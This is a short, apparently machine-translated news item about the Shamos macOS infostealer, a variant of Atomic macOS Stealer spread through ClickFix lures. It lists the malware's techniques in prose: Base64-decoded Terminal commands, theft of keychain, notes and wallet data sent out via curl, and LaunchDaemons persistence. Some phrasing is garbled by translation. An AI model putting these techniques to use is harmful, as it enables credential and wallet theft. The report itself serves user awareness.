The new Shamos pest spreading with fake Mac repairs targets user information
CrowdStrike researchers, Atomic MacOS Stealer (AMOS), a new variant of Shamos pest, deceived Mac users with Clickfix attacks, codes, crypto wallets, Apple Notes and Keychain data announced.
Mac kullanıcılarını hedef alan yeni bir bilgi hırsızı zararlı yazılım ortaya çıktı. Shamos adı verilen zararlı, sahte hata düzeltme kılavuzları ve yazılım yüklemeleri üzerinden dağıtılıyor.
Spread with Clickfix attacks
The attackers direct users to run certain commands at the Terminal through fake Github warehouses and harmful ads.
The commands dissolve a connection with Base64 and download BASH betting from a remote server.
Shamos' talents
- Determining whether it works in a virtual environment with anti-VM controls
- Collecting information about the device using applescript
- Calling and stealing browser data, keychain items, apple notes content and crypto wallet files
- Collect the data in the form of “out.zip” and send it to the attacker via curl
- Create a plist file under LaunchDaemons if it is employed by the administrator (Sudo) powers and becoming permanent
- Download additional loads such as fake versions of Ledger Live Crypto Wallet Application and botnet modules
WARNINGS TO USERS
Experts suggest that commands that are not understood from online sources should not be operated at the Terminal, especially sponsored search results.
Clickfix tactics are becoming widespread
Clickfix attacks threaten not only Mac users, but also many platforms in general.
Kaynak: Beykozun Sesi
What's Your Reaction?
Like
0
Dislike
0
Love
0
Funny
0
Angry
0
Sad
0
Wow
0
